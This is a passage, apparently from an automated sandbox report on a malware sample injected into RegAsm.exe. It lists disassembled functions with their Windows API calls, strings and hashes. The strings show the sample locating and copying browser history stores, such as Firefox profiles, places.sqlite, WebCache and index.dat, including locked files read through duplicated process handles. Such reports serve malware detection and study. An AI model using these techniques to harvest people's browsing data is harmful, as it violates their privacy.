                          • memset.MSVCRT ref: 0040400B
                          • memset.MSVCRT ref: 00404020
                          • memset.MSVCRT ref: 00404035
                            • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                            • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                            • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                            • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                            • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                          • memset.MSVCRT ref: 004040FC
                            • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                            • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                          Strings
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                          • String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
                          • API String ID: 4039892925-3369679110
                          • Opcode ID: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                          • Instruction ID: a33c26704871042caa7cb74448a1974e70df039046fe21947f04a6d8cbe9f93a
                          • Opcode Fuzzy Hash: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                          • Instruction Fuzzy Hash: 354134B294012CBADB20EB56DC85ECF777CAF85314F1180A7B509B3181EA745B948F6A
                          Function 00444432 Relevance: 10.7, APIs: 1, Strings: 6, Instructions: 217COMMON
                          Download Yara Rule
                          APIs
                          • memcpy.MSVCRT(00000048,00451D40,0000002C,000003FF,00445FAE,?,00000000,?,0040B879), ref: 004444E3
                          Strings
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: memcpy
                          • String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
                          • API String ID: 3510742995-2641926074
                          • Opcode ID: 94510af7901ecd36673df76512f8cc8f4b4749faf5a93beda853377b65ea3140
                          • Instruction ID: 565814064bb2237b40e40c3ad6633df45ffc5137317807aec9a32ad89077b3bf
                          • Opcode Fuzzy Hash: 94510af7901ecd36673df76512f8cc8f4b4749faf5a93beda853377b65ea3140
                          • Instruction Fuzzy Hash: BA7119B1600701BFE710AF16CC81B66B7A8BB85319F11452FF4189B742D7BDED908B99
                          Function 0041837F Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 140fileCOMMON
                          Download Yara Rule
                          APIs
                          • CreateFileW.KERNEL32(?,-7FBE829D,00000003,00000000,?,?,00000000), ref: 00418457
                          • GetLastError.KERNEL32 ref: 0041847E
                          • free.MSVCRT ref: 0041848B
                          Strings
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: CreateErrorFileLastfree
                          • String ID: |A
                          • API String ID: 981974120-1717621600
                          • Opcode ID: b6fac9d43bc75127802d1a393ff5c3575377eb3b1acc0c55043375108e40dc75
                          • Instruction ID: 73005d91fce95ddd83c4435d1527c7398ec28b7193468e33704956b81d718a95
                          • Opcode Fuzzy Hash: b6fac9d43bc75127802d1a393ff5c3575377eb3b1acc0c55043375108e40dc75
                          • Instruction Fuzzy Hash: 50412472508306AFD710CF25DC4179BBBE5FF84328F14492EF8A492290EB78D9448B96
                          Function 004032B4 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 119COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                            • Part of subcall function 0044553B: memset.MSVCRT ref: 004455C2
                            • Part of subcall function 0044553B: wcsrchr.MSVCRT ref: 004455DA
                          • memset.MSVCRT ref: 004033B7
                          • memcpy.MSVCRT(?,00000000,0000121C), ref: 004033D0
                          • wcscmp.MSVCRT ref: 004033FC
                          • _wcsicmp.MSVCRT ref: 00403439
                          Strings
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: memset$_wcsicmpfreememcpywcscmpwcsrchr
                          • String ID: $0.@
                          • API String ID: 2758756878-1896041820
                          • Opcode ID: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                          • Instruction ID: ab192eb15c9642abc1a13bae453f9d52c7669558764b377fc560e22e349fc473
                          • Opcode Fuzzy Hash: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                          • Instruction Fuzzy Hash: 6B414A71A0C3819BD770EF65C885A8BB7E8AF86314F004D2FE48C97681DB3899458B5B
                          Function 00403BED Relevance: 9.1, APIs: 4, Strings: 2, Instructions: 57COMMON
                          Download Yara Rule
                          APIs
                          • memset.MSVCRT ref: 00403C09
                          • memset.MSVCRT ref: 00403C1E
                            • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                            • Part of subcall function 00409719: wcslen.MSVCRT ref: 0040971A
                            • Part of subcall function 00409719: wcscat.MSVCRT ref: 00409732
                          • wcscat.MSVCRT ref: 00403C47
                            • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                            • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                            • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                          • wcscat.MSVCRT ref: 00403C70
                          Strings
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: memsetwcscat$CloseFolderPathSpecialwcscpywcslen
                          • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                          • API String ID: 1534475566-1174173950
                          • Opcode ID: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                          • Instruction ID: 5219a381a5be6f9fff484f4b9c8ff18b49dc44b18064e24db21ac924a7a96902
                          • Opcode Fuzzy Hash: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                          • Instruction Fuzzy Hash: 4401A9B294032C76DB207B669C86ECF672C9F45358F01447FB504B7182D9785E844AA9
                          Function 0040A804 Relevance: 9.0, APIs: 6, Instructions: 40libraryCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                          • String ID:
                          • API String ID: 669240632-0
                          • Opcode ID: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                          • Instruction ID: 21688b76284891f368be2c5f4feed5723597baa153f24eadc702144372ba9d0b
                          • Opcode Fuzzy Hash: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                          • Instruction Fuzzy Hash: A6F0A472D0022467DF207B65AC46B8A3B6CBF01754F008072F908B71D2EB789A55CFDA
                          Function 00414C2E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 77registryCOMMON
                          Download Yara Rule
                          APIs
                          • SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                          • memset.MSVCRT ref: 00414C87
                          • RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                          • wcscpy.MSVCRT ref: 00414CFC
                            • Part of subcall function 00409CEA: GetVersionExW.KERNEL32(0045D340,0000001A,00414C4F,?,00000000), ref: 00409D04
                          Strings
                          • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00414CA2, 00414CB2
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: CloseFolderPathSpecialVersionmemsetwcscpy
                          • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                          • API String ID: 2925649097-2036018995
                          • Opcode ID: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                          • Instruction ID: cfba8ba70a3d5c5eb0df7add68d4968905301debfffe1ddd107e81ced3c7690c
                          • Opcode Fuzzy Hash: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                          • Instruction Fuzzy Hash: EE110B31802224ABDB24A7999C4E9EF736CDBD1315F2200A7F80562151F6685EC5C6DE
                          Function 0041443E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 43COMMON
                          Download Yara Rule
                          APIs
                          • wcschr.MSVCRT ref: 00414458
                          • _snwprintf.MSVCRT ref: 0041447D
                          • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0041449B
                          • GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?), ref: 004144B3
                          Strings
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: PrivateProfileString$Write_snwprintfwcschr
                          • String ID: "%s"
                          • API String ID: 1343145685-3297466227
                          • Opcode ID: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                          • Instruction ID: 05c1b6e2b8d8aed92df8b5d38884bf02313f678dea9e3ece4dcd1a0b753c0483
                          • Opcode Fuzzy Hash: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                          • Instruction Fuzzy Hash: 7201AD3240421ABBEF219F81DC09FDB3F6AFF09305F14806ABA08501A1D339C5A5EB58
                          Function 004087B3 Relevance: 7.7, APIs: 6, Instructions: 190COMMON
                          Download Yara Rule
                          APIs
                          • memset.MSVCRT ref: 004087D6
                            • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                            • Part of subcall function 004095D9: memset.MSVCRT ref: 004095FC
                          • memset.MSVCRT ref: 00408828
                          • memset.MSVCRT ref: 00408840
                          • memset.MSVCRT ref: 00408858
                          • memset.MSVCRT ref: 00408870
                          • memset.MSVCRT ref: 00408888
                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                            • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: memset$wcslen$AttributesByteCharFileMultiWidewcscatwcscpy
                          • String ID:
                          • API String ID: 2911713577-0
                          • Opcode ID: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                          • Instruction ID: a7e5ca25de4111a2a05fe91eb9e7b9268c7acadad77a1a504b595fc773a76dc1
                          • Opcode Fuzzy Hash: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                          • Instruction Fuzzy Hash: BD5146B280011D7EEB50E751DC46EEF776CDF05318F0040BEB948B6182EA745F948BA9
                          Function 0041F1A5 Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 165COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: memcmp
                          • String ID: @ $SQLite format 3
                          • API String ID: 1475443563-3708268960
                          • Opcode ID: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                          • Instruction ID: a5e199d7c3355b23248e204991ed7883f9cb1cefd3641e4a8180bf992d12f390
                          • Opcode Fuzzy Hash: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                          • Instruction Fuzzy Hash: 9051C1719002199BDF10DFA9C4817DEB7F4AF44314F1541AAEC14EB246E778EA8ACB88
                          Function 004110DC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 68COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: _wcsicmpqsort
                          • String ID: /nosort$/sort
                          • API String ID: 1579243037-1578091866
                          • Opcode ID: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                          • Instruction ID: 59a4a6edbc2c6816dd96362f3638b70d105e8990563e463c72bda517b6347aa4
                          • Opcode Fuzzy Hash: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                          • Instruction Fuzzy Hash: C8213770700201AFD714FB36C880E96F3AAFF58314F11012EE61897692DB39BC918B4A
                          Function 00413CA4 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 27timeCOMMON
                          Download Yara Rule
                          APIs
                          • GetModuleHandleW.KERNEL32(kernel32.dll,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CB5
                          • GetProcessTimes.KERNEL32(00000000,?,?,?,?,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CF2
                          Strings
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: HandleModuleProcessTimes
                          • String ID: GetProcessTimes$kernel32.dll
                          • API String ID: 116129598-3385500049
                          • Opcode ID: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                          • Instruction ID: 0a9fc9a7fb2a98cd878f934f387e3824ef844cc6c25aa3dbb33b58617c33e237
                          • Opcode Fuzzy Hash: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                          • Instruction Fuzzy Hash: F5F03036204309AFEF008FA6FD06B963BA8BB04742F044066FA0CD1561D7B5D6B0EF99
                          Function 0040E5ED Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 61COMMON
                          Download Yara Rule
                          APIs
                          • memset.MSVCRT ref: 0040E60F
                          • memset.MSVCRT ref: 0040E629
                            • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                            • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                          Strings
                          • Microsoft\Windows\WebCache\WebCacheV24.dat, xrefs: 0040E66F
                          • Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 0040E647
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: memsetwcslen$AttributesFileFolderPathSpecialwcscatwcscpy
                          • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
                          • API String ID: 2887208581-2114579845
                          • Opcode ID: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                          • Instruction ID: 2f29c334d396001d9fe1cebc89c879271eb53039ccc8e03d5a3365d75131e7c5
                          • Opcode Fuzzy Hash: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                          • Instruction Fuzzy Hash: 66118AB3D4012C66EB10E755EC85FDB73ACAF14319F1408B7B904F11C2E6B89F984998
                          Function 004148B6 Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                          Download Yara Rule
                          APIs
                          • FindResourceW.KERNEL32(?,?,?), ref: 004148C3
                          • SizeofResource.KERNEL32(?,00000000), ref: 004148D4
                          • LoadResource.KERNEL32(?,00000000), ref: 004148E4
                          • LockResource.KERNEL32(00000000), ref: 004148EF
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: Resource$FindLoadLockSizeof
                          • String ID:
                          • API String ID: 3473537107-0
                          • Opcode ID: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                          • Instruction ID: 8a72e2f5d7590eb6bb033c3ed88c96ec9d5eb8bcd973c23d1c6560583cb0a60d
                          • Opcode Fuzzy Hash: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                          • Instruction Fuzzy Hash: 0101D2727402156B8B294FB6DD4999BBFAEFFC6391308803AF809D6331DA31C851C688
                          Function 0044DEF7 Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: ??3@
                          • String ID:
                          • API String ID: 613200358-0
                          • Opcode ID: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                          • Instruction ID: aa45652f999bbb0892b85dcd7393972dd4dfe4e89c7b59a5f1a68188070d07e1
                          • Opcode Fuzzy Hash: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                          • Instruction Fuzzy Hash: 5EE08C60F0830052BA31EBBABD40E2723EC5E1AB4271A842FB905C3282CE2CC880C02D
                          Function 0043A9F6 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 979COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          • only a single result allowed for a SELECT that is part of an expression, xrefs: 0043AAD3
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: memset
                          • String ID: only a single result allowed for a SELECT that is part of an expression
                          • API String ID: 2221118986-1725073988
                          • Opcode ID: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                          • Instruction ID: 0c5fbdb45af1b87466ede92b40025f4dfba1e1eb7e0419b48c64bc8603b8f36f
                          • Opcode Fuzzy Hash: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                          • Instruction Fuzzy Hash: 5D827A71608340AFD720DF15C881B1BBBE1FF88318F14491EFA9987262D779E954CB96
                          Function 00444B06 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 108COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: memcmp
                          • String ID: $$8
                          • API String ID: 1475443563-435121686
                          • Opcode ID: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                          • Instruction ID: 2c4e4273d6b09173b98ec99ba1a72f96ebc6587eba5c15334d9e54441f883a66
                          • Opcode Fuzzy Hash: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                          • Instruction Fuzzy Hash: 04314171A00209ABEB10DFA6CDC1BAEB7B9FF88314F11055AE515A3241D778ED048B69
                          Function 0040E4B2 Relevance: 4.6, APIs: 3, Instructions: 87fileCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0040E01E: OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                            • Part of subcall function 0040E01E: GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                            • Part of subcall function 0040E01E: DuplicateHandle.KERNEL32(?,00000104,00000000), ref: 0040E0BF
                            • Part of subcall function 0040E01E: GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                            • Part of subcall function 0040E01E: CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                            • Part of subcall function 0040E01E: MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                            • Part of subcall function 0040E01E: WriteFile.KERNEL32(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                            • Part of subcall function 0040E01E: UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                            • Part of subcall function 0040E01E: CloseHandle.KERNEL32(?), ref: 0040E13E
                          • CloseHandle.KERNEL32(000000FF), ref: 0040E582
                            • Part of subcall function 0040E2AB: memset.MSVCRT ref: 0040E380
                            • Part of subcall function 0040E2AB: wcschr.MSVCRT ref: 0040E3B8
                            • Part of subcall function 0040E2AB: memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,756F13E0), ref: 0040E3EC
                          • DeleteFileW.KERNEL32(?,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5A3
                          • CloseHandle.KERNEL32(000000FF), ref: 0040E5CA
                            • Part of subcall function 0040E175: memset.MSVCRT ref: 0040E1BD
                            • Part of subcall function 0040E175: _snwprintf.MSVCRT ref: 0040E257
                            • Part of subcall function 0040E175: free.MSVCRT ref: 0040E28B
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: File$Handle$Close$ProcessViewmemset$CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintffreememcpywcschr
                          • String ID:
                          • API String ID: 1979745280-0
                          • Opcode ID: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                          • Instruction ID: 90d235a97b45fa8760f9e747b2c38a4e83ddeae1161d8ec943a7631d31c9d9e7
                          • Opcode Fuzzy Hash: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                          • Instruction Fuzzy Hash: DA312CB1C00618ABCF60DF96CD456CEF7B8AF44318F1006AB9518B31A1DB755E95CF58
                          Function 00403A16 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 67COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C09
                            • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C1E
                            • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C47
                            • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C70
                          • memset.MSVCRT ref: 00403A55
                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                            • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                            • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                            • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                            • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                            • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                          Strings
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: memsetwcscatwcslen$free$AttributesFilememcpywcscpy
                          • String ID: history.dat$places.sqlite
                          • API String ID: 2641622041-467022611
                          • Opcode ID: ff38290cf6d73649d3c52fc0ad95bc2cdf601f157f84f60878f9098853983ee3
                          • Instruction ID: 4d52d99a2018a06e8b3479be55870673e402391ac5db5fe9af26a684ed702786
                          • Opcode Fuzzy Hash: ff38290cf6d73649d3c52fc0ad95bc2cdf601f157f84f60878f9098853983ee3
                          • Instruction Fuzzy Hash: CA112EB2A0111866DB10FA66CD4AACE77BCAF54354F1001B7B915B20C2EB3CAF45CA69
                          Function 004175ED Relevance: 4.5, APIs: 3, Instructions: 49fileCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00417570: SetFilePointer.KERNEL32(?,?,?,00000000), ref: 00417591
                            • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A2
                            • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A8
                          • ReadFile.KERNEL32(?,?,?,?,00000000), ref: 0041761D
                          • GetLastError.KERNEL32 ref: 00417627
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: ErrorLast$File$PointerRead
                          • String ID:
                          • API String ID: 839530781-0
                          • Opcode ID: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                          • Instruction ID: c9208e3d43fc8ff2949f7201360c8f82def2114e122364bdeb0a9035ecfb973e
                          • Opcode Fuzzy Hash: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                          • Instruction Fuzzy Hash: D001A236208204BBEB008F69DC45BDA3B78FB153B4F100427F908C6640E275D89096EA
                          Function 0040C1D3 Relevance: 4.5, APIs: 1, Strings: 2, Instructions: 45COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: FileFindFirst
                          • String ID: *.*$index.dat
                          • API String ID: 1974802433-2863569691
                          • Opcode ID: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                          • Instruction ID: 5c3219b8572ff4376619b1de75d6d1d1b7443a793578eadcc31bed7d77429009
